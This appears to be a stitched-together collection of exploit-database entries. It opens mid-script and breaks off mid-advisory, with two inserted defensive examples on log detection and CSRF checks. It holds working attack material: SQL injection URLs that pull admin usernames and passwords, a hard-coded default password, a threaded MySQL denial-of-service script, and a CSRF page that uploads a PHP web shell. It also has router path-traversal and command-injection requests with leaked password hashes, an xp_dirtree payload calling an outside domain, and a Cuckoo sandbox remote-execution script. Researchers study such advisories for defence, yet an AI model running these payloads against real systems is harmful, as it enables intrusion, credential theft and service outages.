    // everything after the Content-Type header is the disclosed file
    $e = explode('Content-Type: text/html', $contents);
    print $e[1];
}
?>
# Exploit Title: Property Agent RealeState Script Sql Injection
# Date: 2015-05-27
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.phpscriptsmall.com/product/php-realestate-script/
# Version: 4.9.0
Exploit :
http://server/[path]/single.php?view_id=-99999+[SQL+Command]
Test :
http://server/single.php?view_id=-57+/*!50000union*/+select+1,2,user_name,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin_login
Admin Panel : http://server/admin/
Username : admin
Password : inetsol
#!/usr/bin/env python
# Title: MySQL Procedure Analyse DoS Exploit
# Author: Osanda Malith Jayathissa (@OsandaMalith)
# E-Mail: osanda[cat]unseen.is
# Version: Vulnerable upto MySQL 5.5.45
# Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-4870/
# This exploit is compatible with both Python 3.x and 2.x
# CVE: CVE-2015-4870
from __future__ import print_function
import threading
import time
import sys
import os

try:
    import urllib.request as urllib2
    import urllib.parse as urllib
except ImportError:
    import urllib2
    import urllib

try:
    input = raw_input
except NameError:
    pass

host = "http://host/xxx.php?id=1'"
payload = " procedure analyse((select*from(select 1)x),1)-- -"
payload = urllib.quote(payload)
url = host + payload

req = urllib2.Request(url)
req.add_header('Accept', '*/*')
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0')
#req.add_header('Cookie', 'security=low; PHPSESSID=uegfnidhcdicvlsrc0uesio455')
req.add_header('Connection', '')
req.add_header('Content-type', 'text/xml')

cls = lambda: os.system('cls') if os.name == 'nt' else os.system('clear')


class DoS(threading.Thread):
    def run(self):
        print("{0} started!".format(self.getName()))
        for i in range(100):
            urllib2.urlopen(req)
            time.sleep(.2)
        print("{0} finished!".format(self.getName()))


def banner():
    print ('''
 ____ _____ __
/'\\_/`\\ /\\ _`\\ /\\ __`\\/\\ \\
/\\ \\ __ __\\ \\,\\L\\_\\ \\ \\/\\ \\ \\ \\
\\ \\ \\__\\ \\/\\ \\/\\ \\\\/_\\__ \\\\ \\ \\ \\ \\ \\ __
\\ \\ \\_/\\ \\ \\ \\_\\ \\ /\\ \\L\\ \\ \\ \\\\'\\\\ \\ \\L\\ \\
\\ \\_\\\\ \\_\\/`____ \\\\ `\\____\\ \\___\\_\\ \\____/
\\/_/ \\/_/`/___/> \\\\/_____/\\/__//_/\\/___/
/\\___/
\\/__/
____ ____
/\\ _`\\ /\\ _`\\
\\ \\ \\/\\ \\ ___\\ \\,\\L\\_\\
\\ \\ \\ \\ \\ / __`\\/_\\__ \\
\\ \\ \\_\\ \\/\\ \\L\\ \\/\\ \\L\\ \\
\\ \\____/\\ \\____/\\ `\\____\\
\\/___/ \\/___/ \\/_____/
[*] Author: Osanda Malith Jayathissa (@OsandaMalith)
[*] E-Mail: osanda[cat]unseen.is
[*] Website: http://osandamalith.wordpress.com
[!] Author takes no responsibility of any damage you cause
[!] Strictly for Educational purposes only
''')
    print("[*] Host: {0}".format(host))
    input("\n\t[-] Press Return to launch the attack\n")


def _start():
    try:
        cls()
        banner()
        for i in range(10000):
            thread = DoS(name = "[+] Thread-{0}".format(i + 1))
            thread.start()
            time.sleep(.1)
    except KeyboardInterrupt:
        print ('\n[!] Ctrl + C detected\n[!] Exiting')
        sys.exit(0)
    except EOFError:
        print ('\n[!] Ctrl + D detected\n[!] Exiting')
        sys.exit(0)


if __name__ == '__main__':
    _start()
# Exploit Title: real-estate classified script Sql Injection
# Date: 2015-05-29
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.phpscriptsmall.com/product/open-source-real-estate-script/
# Version: 3.6.0
Exploit :
http://server/[path]/contact_view.php?contact=-99999+[SQL+Command]
Test :
http://server/contact_view.php?contact=-25527%27+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,10,13,14,15,16,17,18,19,20,username,22,password,24,25,26,27,28,29,30,31,32,33,34,35,36,37+/*!50000from*/+/*!50000admin_login*/%23
Admin Panel : http://server/admin/
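The three MySQL-side advisories above (the Property Agent and real-estate classified script UNION injections and the PROCEDURE ANALYSE crash) share a detection problem: the payloads arrive URL-encoded, with '+' for spaces, and wrapped in /*!50000...*/ versioned comments that MySQL executes but a naive signature does not see through. As an added example, not code from any of those advisories, here is detection logic that normalizes a query string the way MySQL will read it and runs it over constructed access-log lines carrying exactly the page's three payloads plus one benign request. The log lines, the client addresses and the rule set are this example's own.

```python
# Added example (not from the advisories above): normalize query-string values as MySQL
# will see them, then flag UNION SELECT and PROCEDURE ANALYSE payloads in access-log lines.
import re
from urllib.parse import unquote, unquote_plus

# Constructed Apache-style access-log lines; the query strings are the page's three payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/May/2015:10:01:02 +0000] "GET /single.php?view_id=-57+/*!50000union*/+select+1,2,user_name,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin_login HTTP/1.1" 200 5120',
    '10.0.0.5 - - [29/May/2015:10:02:11 +0000] "GET /contact_view.php?contact=-25527%27+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,10,13,14,15,16,17,18,19,20,username,22,password,24,25,26,27,28,29,30,31,32,33,34,35,36,37+/*!50000from*/+/*!50000admin_login*/%23 HTTP/1.1" 200 4096',
    '10.0.0.7 - - [29/May/2016:10:03:45 +0000] "GET /xxx.php?id=1%27%20procedure%20analyse%28%28select%2Afrom%28select%201%29x%29%2C1%29--%20- HTTP/1.1" 500 0',
    '10.0.0.9 - - [29/May/2016:10:04:00 +0000] "GET /single.php?view_id=57&page=2 HTTP/1.1" 200 5120',
]

LOG_LINE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

RULES = [
    ("union-select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b")),
    ("procedure-analyse", re.compile(r"\bprocedure\s+analyse\s*\(")),
]


def normalize(value):
    """Decode a query-string value the way MySQL will see it: '+' and %XX become characters,
    /*!NNNNN ... */ versioned comments keep their body (MySQL executes it), plain comments
    are dropped, and whitespace and case are collapsed."""
    s = unquote_plus(value)
    s = re.sub(r"/\*!\d{5}(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"\s+", " ", s).strip().lower()


def scan_line(line):
    """{'client', 'path', 'hits'} for a parseable line, None otherwise. Each hit is
    (parameter, [rule names]); a raw '/*!' in the value is flagged as an evasion marker."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    path, _, query = m.group("path").partition("?")
    hits = []
    for param in filter(None, query.split("&")):
        name, _, value = param.partition("=")
        matched = [rule for rule, rx in RULES if rx.search(normalize(value))]
        if "/*!" in unquote(value):
            matched.append("versioned-comment")
        if matched:
            hits.append((name, sorted(matched)))
    return {"client": m.group("client"), "path": path, "hits": hits}


def scan(lines):
    """All lines with at least one hit, in log order."""
    return [r for r in (scan_line(l) for l in lines) if r and r["hits"]]


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["client"], r["path"], r["hits"])
```

Normalizing before matching is the part that matters: matching the raw request for "union select" misses both UNION payloads on this page because the keyword is hidden in a versioned comment, while matching the decoded and comment-stripped value catches them and still lets the benign view_id=57 request through.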
<!DOCTYPE html>
<!--
FlatPress 1.0.3 CSRF Arbitrary File Upload
Vendor: Edoardo Vacchi
Product web page: http://www.flatpress.org
Affected version: 1.0.3
Summary: FlatPress is a blogging engine that saves your posts as
simple text files. Forget about SQL! You just need some PHP.
Desc: The vulnerability is caused by improper verification of files
uploaded through the Uploader script via the 'upload[]' POST parameter,
which allows arbitrary files to be written to the '/fp-content/attachs'
directory. The application performs this action on any HTTP request
without checking that the request originated from the application
itself, so an attacker who lures a logged-in administrator to a
malicious web page can upload a PHP script with administrative
privileges and then execute system commands through it.
Tested on: Apache/2.4.10
PHP/5.6.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5328
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5328.php
04.04.2016
-->
<html>
<title>FlatPress 1.0.3 CSRF Arbitrary File Upload RCE PoC</title>
<body>
<script type="text/javascript">
function exec(){
var command = document.getElementById("exec");
var url = "http://localhost/flatpress/fp-content/attachs/test.php?cmd=";
var cmdexec = command.value;
window.open(url+cmdexec,"ZSL_iframe");
}
function upload(){
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/flatpress/admin.php?p=uploader&action=default", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundary1Ix0O1LgWmzQa0af");
xhr.withCredentials = true;
var body = "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"_wpnonce\"\r\n" +
"\r\n" +
"5a462c73ac\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n" +
"\r\n" +
"/flatpress/admin.php?p=uploader\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"test.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php\r\n" +
"system($_REQUEST[\'cmd\']);\r\n" +
"?\x3e\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload\"\r\n" +
"\r\n" +
"Upload\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<h3>FlatPress 1.0.3 CSRF Arbitrary File Upload RCE PoC Script</h3>
<form action="#">
<button type="button" onclick=upload()>Upload test.php file!</button>
</form><br />
<form action="javascript:exec()">
<input type="text" id="exec" placeholder="Enter a command">
<input type="submit" value="Execute!">
</form><br />
<iframe
style="border:2px;border-style:dashed;color:#d3d3d3"
srcdoc="command output frame"
width="700" height="600"
name="ZSL_iframe">
</iframe>
<br />
<font size="2" color="#d3d3d3">ZSL-2016-5328</font>
</body>
</html>
# AirOS NanoStation M2 v5.6-beta
# Arbitrary File Download & Remote Command Execution
# Tested on: XM.v5.6-beta5.24359.141008.1753 - Build: 2435
# Linux Awesome 2.6.32.63 #1 Wed Oct 8 17:54:30 EEST 2014 mips unknown
#
# Date: May 30, 2016
# Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com>
# Valid credentials are required.
# Most devices run the factory default user/password combination (ubnt:ubnt).
# Take a look at /usr/www/scr.cgi
<?
include("lib/settings.inc");
include("lib/system.inc");
$filename = $fname + ".sh";
$file = $fname + $status;
header("Content-Type: application/force-download");
header("Content-Disposition: attachment; filename=" + $filename);
passthru("cat /tmp/persistent/$file");
exit;
# Arbitrary File Download
# Poc:
GET http://x.x.x.x/scr.cgi?fname=../../../../../etc/passwd%00&status=
Raw Response: dWJudDpWdnB2Q3doY2NGdjZROjA6MDpBZG1pbmlzdHJhdG9yOi9ldGMvcGVyc2lzdGVudDovYmluL3NoCm1jdXNlcjohVnZERThDMkVCMTowOjA6Oi9ldGMvcGVyc2lzdGVudC9tY3VzZXI6L2Jpbi9zaAo=
Base64 Decoded: ubnt:VvpvCwhccFv6Q:0:0:Administrator:/etc/persistent:/bin/sh
mcuser:!VvDE8C2EB1:0:0::/etc/persistent/mcuser:/bin/sh
# Remote Command Execution:
# Poc:
GET http://x.x.x.x/scr.cgi?fname=rc.poststart.sh;cat%20/etc/hosts%00&status=
Raw Response: MTI3LjAuMC4xCWxvY2FsaG9zdC5sb2NhbGRvbWFpbglsb2NhbGhvc3QK
Base64 Decoded: 127.0.0.1 localhost.localdomain localhost
######################################################################
# Exploit Title: ProcessMaker v3.0.1.7 Multiple vulnerabilities
# Date: 31/05/2016
# Author: Mickael Dorigny @ information-security.fr
# Vendor or Software Link: http://www.processmaker.com/
# Version: 3.0.1.7
# Category: Multiple Vulnerabilities
######################################################################
ProcessMaker description :
======================================================================
ProcessMaker Inc. is the developer of the ProcessMaker Workflow & BPM Software Suite. ProcessMaker automates form based, approval driven workflow that improves the way information flows between data and systems. ProcessMaker has been downloaded more than 750,000 times and is currently being used by thousands of companies around the world. ProcessMaker has a network of more than 35 partners located on 5 different continents.
Vulnerabilities description:
======================================================================
ProcessMaker v3.0.1.7 is affected by multiple vulnerabilities:
- Reflected XSS
- Stored XSS
- CSRF (x2)
PoC n°1 - CSRF on Designer Project Creation
======================================================================
The Designer Project creation process is vulnerable to CSRF: a forged request can be used to force an authenticated user with Designer project creation rights to create a new Designer project.
PoC:
[REQUEST]
http://server/sysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject
[POSTDATA]
PRO_TITLE=AAA&PRO_DESCRIPTION=BBB&PRO_CATEGORY=
The following HTML form can be used to exploit this CSRF vulnerability when combined with phishing techniques or auto-submit JavaScript tricks:
<form method=POST name=form1 action="http://server/sysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject">
<input type=text name=PRO_TITLE value=XXX>
<input type=text name=PRO_DESCRIPTION value=XXX>
<input type=text name=PRO_CATEGORY value="">
<input type=submit>
</form>
<script>
window.onload = function(){
document.forms['form1'].submit()
}
</script>
Note that this CSRF vulnerability can be combined with PoC n°3, which exposes a stored XSS vulnerability in the Description input of the Designer Project.
Proof of Concept n°2 - CSRF on group creation
======================================================================
The group creation process is vulnerable to CSRF: a forged request can be used to force an authenticated user with admin rights to create a new group.
PoC:
[REQUEST]
http://server/sysworkflow/en/neoclassic/groups/groups_Ajax?action=saveNewGroup
[POSTDATA]
name=swdcs&status=1
The following HTML form can be used to exploit this CSRF vulnerability when combined with phishing techniques or auto-submit JavaScript tricks:
<form method=POST name=form1 action="http://192.168.1.14/sysworkflow/en/neoclassic/groups/groups_Ajax?action=saveNewGroup">
<input type=text name=name value=2>
<input type=text name=status value=1>
<input type=submit>
</form>
<script>
window.onload = function(){
document.forms['form1'].submit()
}
</script>
Proof of Concept n°3 - Stored XSS on Designer Project Creation
======================================================================
The "description" input of the designer project creation process is vulnerable to stored XSS. A user can use this input to store an XSS an make other user's browsers executes controlled JavaScript instructions.
PoC
[REQUEST]
http://server/sysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject
[POSTDATA]
PRO_TITLE=AA<img src=x onerror=alert(1)>A&PRO_DESCRIPTION=BBB&PRO_CATEGORY=
Note that this stored XSS vulnerability can be combined with PoC n°1, which exposes a CSRF vulnerability in the Designer Project creation process.
Through this vulnerability, an attacker could tamper with page rendering or redirect the victim to a fake login page.
Proof of Concept n°4 - Reflected Cross-Site Scripting (RXSS) with authentication:
======================================================================
The search form in the Design Project can redirect the user to a blank page without HTML markup. This page displays some information, including the user's request. This can be used to execute JavaScript in the user's browser.
Note that the search request uses the POST method; to exploit this vulnerability, an attacker needs to lure a user into visiting an HTML page whose form is auto-submitted by JavaScript to generate the forged request.
PoC:
[REQUEST]
http://server/sysworkflow/en/neoclassic/processes/processesList
[POSTDATA]
processName=<img src=x onerror=alert(1);>&start=0&limit=25&category=%3Creset%3E
Through this vulnerability, an attacker could tamper with page rendering or redirect the victim to a fake login page.
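An added example in Python (not ProcessMaker code, which is PHP): the server-side checks a saveProcess handler needs in order to reject the auto-submitted forms shown in PoC n°1 and n°2 and to neutralise the stored payload from PoC n°3. The session id, the server secret, the csrf_token field name and the request dictionaries are assumptions of the example.

```python
"""Same-origin and synchronizer-token checks for the forged saveProcess POST."""
import hashlib
import hmac
import html
import secrets
from urllib.parse import parse_qs, urlsplit

# Per-deployment secret kept on the server; a page on the attacker's origin
# never learns it, so it cannot mint a valid token.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id):
    """Synchronizer token bound to the session; embedded in the legitimate form."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_save_process(request, session_id, expected_host):
    """request: {'origin': ..., 'referer': ..., 'body': 'PRO_TITLE=...&...'} (constructed
    shape, not a framework object). Returns (accepted, reason, fields); accepted
    fields are HTML-escaped so they are safe to store and render."""
    # 1. A form auto-submitted from the attacker's page arrives with a foreign
    #    Origin (browsers fall back to Referer for older clients).
    source = request.get("origin") or request.get("referer")
    if not source or urlsplit(source).netloc != expected_host:
        return False, "cross-origin request", None
    fields = {k: v[0] for k, v in
              parse_qs(request.get("body", ""), keep_blank_values=True).items()}
    # 2. The token lives in the page the victim loaded, not in the attacker's
    #    form; compare in constant time.
    submitted = fields.pop("csrf_token", "")
    if not hmac.compare_digest(submitted.encode(), csrf_token(session_id).encode()):
        return False, "missing or invalid CSRF token", None
    # 3. Stored XSS (PoC n°3): escape before the value reaches any page.
    return True, "ok", {k: html.escape(v) for k, v in fields.items()}


# Constructed requests: the forged one mirrors the PoC n°1 form, the legitimate
# one carries the token and the PoC n°3 title payload.
SESSION_ID = "session-of-victim"
FORGED_REQUEST = {
    "origin": "http://attacker.example",
    "body": "PRO_TITLE=AAA&PRO_DESCRIPTION=BBB&PRO_CATEGORY=",
}
LEGIT_REQUEST = {
    "origin": "http://server",
    "body": ("PRO_TITLE=AA%3Cimg+src%3Dx+onerror%3Dalert(1)%3EA&PRO_DESCRIPTION=BBB"
             "&PRO_CATEGORY=&csrf_token=" + csrf_token(SESSION_ID)),
}

if __name__ == "__main__":
    print(check_save_process(FORGED_REQUEST, SESSION_ID, "server"))
    print(check_save_process(LEGIT_REQUEST, SESSION_ID, "server"))
```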
Solution:
======================================================================
- Update your ProcessMaker installation to a newer version (3.0.1.8 or later)
Additional resources:
======================================================================
- https://www.youtube.com/watch?v=TO2Fu-pbLI8
- http://www.processmaker.com/
Report timeline:
======================================================================
2016-01-26 : Vendor informed of the vulnerabilities
2016-01-27 : Vendor response: fixes will be part of the next release
2016-05-25 : 3.0.1.8 released with fixes for the vulnerabilities
2016-05-31 : Advisory release
Credits:
======================================================================
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr
My Packet Storm Security profile : https://packetstormsecurity.com/files/author/12112/
--
SYNETIS
CONTACT: www.synetis.com | www.information-security.fr
# Exploit Title: CCextractor 0.80 Access Violation Crash
# Date: 31st May 2016
# Exploit Author: David Silveiro (Xino.co.uk)
# Vendor Homepage: http://www.ccextractor.org/
# Software Link: http://www.ccextractor.org/download-ccextractor.html
# Version: 0.80
# Tested on: Ubuntu 14 LTS
# CVE : 0 day
from subprocess import call
from shlex import split
from time import sleep

def crash():
    command = './ccextractor crash'
    # bytes literal so the file is written identically under Python 2 and 3
    buffer = b'\x00\x00\x00\x04ssixssixs'
    with open('crash', 'w+b') as file:
        file.write(buffer)
    try:
        call(split(command))
        print("Exploit successful! ")
    except Exception:
        print("Error: Something has gone wrong!")

def main():
    print("Author: David Silveiro ")
    print(" CCextractor 0.80 Access Violation Crash ")
    sleep(2)
    crash()

if __name__ == "__main__":
    main()
Advisory ID: ZSL-2016-5336
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5336.php
eCardMAX 10.5 SQL Injection and XSS Vulnerabilities
[Software]
- eCardMAX 10.5
[Vendor]
- eCardMAX.COM - http://www.ecardmax.com/
[Vendor Product Description]
- eCardMax is the most trusted, powerful and dynamic online ecard software solution. It enables you to create your
own ecard website with many of the advanced features found on other major sites. Starting your own ecard website
with eCardMax is fast and easy.
[Advisory Timeline]
- 13/06/2016 -> Vulnerability discovered;
- 13/06/2016 -> First contact with vendor;
- 13/06/2016 -> Vendor responds asking for details;
- 14/06/2016 -> Vulnerability details sent to the vendor;
- 17/06/2016 -> Vendor working on a patch;
- 28/06/2016 -> Vendor Releases Patch
- 01/07/2016 -> Public Security Advisory Published
[Bug Summary]
- SQL Injection
- Cross Site Scripting (Reflected)
[Impact]
- High
[Affected Version]
- v10.5
[Tested on]
- Apache/2.2.26
- PHP/5.3.28
- MySQL/5.5.49-cll
[Bug Description and Proof of Concept]
- eCardMAX suffers from a SQL Injection vulnerability. Input passed via the 'row_number' GET parameter is not properly
sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via multiple parameters
is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.
[Proof-of-Concept]
1. SQL Injection:
Parameter: row_number (GET)
POC URL:
http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%20order%20by%201--&search_year=2016&page=2
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2. Cross Site Scripting (Reflected):
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=all&keyword=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cmd_button=Search+User
Parameter(s): keyword (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_cellphone_carrier&row_number=15&page=14%22%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
Parameter(s): page (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search_year=2016&page=2
Parameter(s): row_number (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display_inactive_account&what=&row_number=15&what2=&cmd_button=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&list_item=%3C/script%3E%3Cscript%3Ealert(2)%3C/script%3E&search_field=%3C/script%3E%3Cscript%3Ealert(3)%3C/script%3E&keyword=&num_day=%3C/script%3E%3Cscript%3Ealert(4)%3C/script%3E&num_what=%3C/script%3E%3Cscript%3Ealert(5)%3C/script%3E&from_month=%3C/script%3E%3Cscript%3Ealert(6)%3C/script%3E&from_day=%3C/script%3E%3Cscript%3Ealert(7)%3C/script%3E&from_year=%3C/script%3E%3Cscript%3Ealert(8)%3C/script%3E&to_day=%3C/script%3E%3Cscript%3Ealert(9)%3C/script%3E&to_month=%3C/script%3E%3Cscript%3Ealert(10)%3C/script%3E&to_year=%3C/script%3E%3Cscript%3Ealert(11)%3C/script%3E&page=2%3C/script%3E%3Cscript%3Ealert(12)%3C/script%3E
Parameter(s): cmd_button, list_item, search_field, num_day, num_what, from_month, from_day, from_year, to_day, to_month, to_year, page (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=user_name_id&cmd_button=Search+User&keyword=833981213299707%22%3E%3Cscript%3Ealert(1)%3C/script%3E
Parameter(s): keyword (GET)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
All flaws described here were discovered and researched by:
Bikramaditya Guha aka "PhoenixX"
Exploit Title: Notilus SQL injection
Product: Notilus travel solution software
Vulnerable Versions: 2012 R3
Tested Version: 2012 R3
Advisory Publication: 03/06/2016
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]
CVE Reference: NONE
Credit: Alex Haynes
Advisory Details:
(1) Vendor & Product Description
--------------------------------
Vendor: DIMO Software
Product & Version:
Notilus travel solution software v2012 R3
Vendor URL & Download:
http://www.notilus.com/
Product Description:
"DIMO Software is the European leader on the Travel and Expense Management market. We publish the Notilus solution, a simple efficient software to manage the entire business travel process: travel orders, online and offline booking, expense reports, supplier invoices, car fleet, mobile telephones, etc."
(2) Vulnerability Details:
--------------------------
The Notilus software is vulnerable to SQL injection attacks, specifically in the password modification fields.
Proof of concept:
POST TO /company/profilv4/Password.aspx
Vulnerable parameter: H_OLD
Payload:
ACTION=1&H_OLD=mypass'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\testdomain.mydo'%2b'main.com\vps'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&H_NEW1=%27+or+%27%27%3D%27&H_NEW2=%27+or+%27%27%3D%27
(3) Advisory Timeline:
----------------------
15/02/16 - First Contact: vendor requests details of vulnerability
03/03/16 - Follow up to vendor to inquire about availability of a fix.
03/03/16 - vendor responds that fix will be available 16/03/16.
16/03/16 - Vendor releases patch.
(4) Solution:
------------
Patch to latest available 2012 R3 branch or upgrade to version 2016.
(5) Credits:
------------
Discovered by Alex Haynes
# -*- coding: utf8 -*-
"""
# Exploit Title: Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
# Date: June 28th 2016
# Exploit Author: Rémi ROCHER
# Vendor Homepage: https://cuckoosandbox.org/
# Software Link: https://github.com/cuckoosandbox/cuckoo/archive/master.zip
# Version: <= 2.0.1
# Tested on: MS Windows 7, MS Windows 10 (With & without UAC)
# CVE : None
--[ NAME
Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
--[ DESCRIPTION
Cuckoo Sandbox is Free Software, basically used by researchers to analyze
(potential) malware behavior. It is also implemented industrially by
private companies for detecting potential threats within IT Networks
featuring dedicated so-called security appliances.
This basic Proof of Concept exploit is spawning a calc.exe process with
Administrator privileges, assuming:
* The Cuckoo agent.py is running with Admin privileges (should be
the case)
* The current user can access a local interface (should be the case)
* Optional for true Remote Code Execution: External equipment can
access the XMLRPC port (default 8000).
One may also call the complete() method in order to stop any further
detection or screenshot.
Such vulnerabilities can be used to either trick the very detection
system, or potentially escape the sandbox machine itself. An attacker
could also exploit such bugs as a pivot in order to attack sensitive
systems.
--[ AUTHORS
* Rémi ROCHER - Armature Technologies
* Thomas MARTHÉLY - Armature Technologies
--[ RESOURCE
* Repository: https://github.com/cuckoosandbox/cuckoo
"""
import xmlrpclib
from StringIO import StringIO
from zipfile import ZipFile, ZipInfo, ZIP_STORED, ZIP_DEFLATED
def execute(x, cmd="cmd /c start"):
    output = StringIO()
    file = ZipFile(output, "w", ZIP_STORED)
    info = ZipInfo("analyzer.py")
    info.compress_type = ZIP_DEFLATED
    content = ("""
import subprocess
if __name__ == "__main__":
    subprocess.Popen("%s",stdout=subprocess.PIPE,stderr=subprocess.PIPE)
""" % cmd)
    file.writestr(info, content)
    file.close()
    data = xmlrpclib.Binary(output.getvalue())
    if x.add_analyzer(data):
        return x.execute()

if __name__ == "__main__":
    x = xmlrpclib.ServerProxy("http://localhost:8000")
    execute(x, "calc.exe")
    # x.complete() # Blackout mode
<!--
KL-001-2016-002 : Ubiquiti Administration Portal CSRF to Remote Command Execution
Title: Ubiquiti Administration Portal CSRF to Remote Command Execution
Advisory ID: KL-001-2016-002
Publication Date: 2016.06.28
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-002.txt
1. Vulnerability Details
Affected Vendor: Ubiquiti
Affected Product: AirGateway, AirFiber, mFi
Affected Version: 1.1.6, 3.2, 2.1.11
Platform: Embedded Linux
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF);
CWE-77: Improper Neutralization of Special Elements
used in a Command ('Command Injection')
Impact: Arbitrary Code Execution
Attack vector: HTTP
2. Vulnerability Description
The Ubiquiti AirGateway, AirFiber and mFi platforms feature
remote administration via an authenticated web-based portal.
Lack of CSRF protection in the Remote Administration Portal,
and unsafe passing of user input to operating system commands
executed with root privileges, can be abused in a way that
enables remote command execution.
3. Technical Description
The firmware files analyzed were
AirGWP.v1.1.6.28062.150731.1520.bin, AF24.v3.2.bin, and
firmware.bin respectively.
The MD5 hash values for the vulnerable files served by the
administration portal are:
AirGateway b45fe8e491d62251f0a7a100c636178a /usr/www/system.cgi
AirFiber d8926f7f65a2111f4036413f985082b9 /usr/www/system.cgi
mFi 960e8f6e507b227dbc4b65fc7a7036bc /usr/www/system.cgi
The firmware file contains a LZMA compressed, squashfs
partition. The binaries running on the embedded device are
compiled for a MIPS CPU. The device can be easily virtualized
using QEMU:
